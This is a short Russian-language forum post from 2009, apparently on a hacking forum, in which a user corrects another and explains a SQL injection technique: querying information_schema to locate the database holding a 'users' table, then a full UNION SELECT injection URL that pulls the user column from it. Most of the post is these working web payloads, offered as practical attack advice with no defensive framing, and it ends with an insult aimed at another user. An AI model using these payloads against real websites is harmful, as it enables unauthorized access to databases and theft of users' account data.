Показать сообщение отдельно

  #4  
Старый 10.12.2009, 22:00
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

DeluxeS:

не неси бред, такой хрени я не мог писать:

select+table_schema+from+information_schema.tables +where+table_name='users'--

и вот то, что выведет, и подставлять к users через точку, например вывело amx, значит итоговый правильный запрос такой:

http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,user,14, 15,16,17,18,19,20,21,22,23,24,25+from+amx.users--

где amx - имя БД, где хранится таблица users

ЗЫЖ Вот уродец, ниже еще один
 
Ответить с цитированием